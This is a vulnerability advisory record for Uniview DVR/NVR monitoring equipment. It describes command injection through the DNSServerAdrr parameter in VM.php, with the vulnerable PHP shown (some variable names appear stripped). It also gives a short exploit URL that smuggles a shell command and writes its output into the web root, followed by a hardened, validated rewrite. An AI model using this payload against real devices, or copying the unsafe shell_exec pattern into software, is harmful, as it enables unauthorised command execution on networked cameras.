Zhejiang Uniview Technologies security (DVR/NVR) and other monitoring equipment command execution

2016-06-22T00:00:00
ID SSV:91938
Type seebug
Reporter
Modified 2016-06-22T00:00:00

Description

In the file /Interface/DevManage/VM.php, the request parameter DNSServerAdrr is concatenated into a shell_exec() command:

```php
// ... code omitted ...

// Set the DNS to resolve the server address
case 'setDNSServer' :
    shell_exec('echo "nameserver '. ['DNSServerAdrr'].'"'.' > /etc/resolv.conf');
    ['Code'] = 0;
    getTip();
    echo json_encode();
    break;

default :
    showErrorRequest();
    break;

// ... code omitted ...
```

EXP:

```
/Interface/DevManage/VM.php?cmd=setDNSServer&DNSServerAdrr=" | whoami >/usr/local/program/ecrwww/apache/htdocs/Interface/DevManage/11.php %23"
```
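A hardened form of the setDNSServer case, as an added example (not the vendor's code and not from the original report): the address is validated as an IP literal and written to the file directly, so no shell is involved. The function names, the `Message` field and the non-zero `Code` values are assumptions made for illustration.

```php
<?php
// Added example, not vendor code. Names below are hypothetical.

// Return the resolv.conf line for a valid IPv4/IPv6 literal, or null otherwise.
function buildResolvConf(string $input): ?string
{
    $addr = trim($input);
    // FILTER_VALIDATE_IP accepts only an IP literal, so quotes, pipes,
    // redirections and other shell metacharacters are rejected here.
    if (filter_var($addr, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    return "nameserver " . $addr . "\n";
}

// Write the DNS server without invoking a shell at all.
function setDnsServer(string $input, string $path = '/etc/resolv.conf'): array
{
    $content = buildResolvConf($input);
    if ($content === null) {
        // Assumed error convention: non-zero Code means failure.
        return ['Code' => 1, 'Message' => 'invalid DNS server address'];
    }
    if (file_put_contents($path, $content, LOCK_EX) === false) {
        return ['Code' => 2, 'Message' => 'could not write resolver file'];
    }
    return ['Code' => 0];
}

// Constructed sample inputs, written to a temporary file instead of /etc/resolv.conf.
$tmp = tempnam(sys_get_temp_dir(), 'resolv');
$samples = [
    '8.8.8.8',               // valid IPv4
    '2001:4860:4860::8888',  // valid IPv6
    '8.8.8.8" ; id #',       // constructed input with shell metacharacters
    '',                      // missing parameter
];
foreach ($samples as $sample) {
    $result = setDnsServer($sample, $tmp);
    echo json_encode(['input' => $sample] + $result), "\n";
}
unlink($tmp);
```

Only the first two samples return `Code` 0; the others are rejected before anything is written.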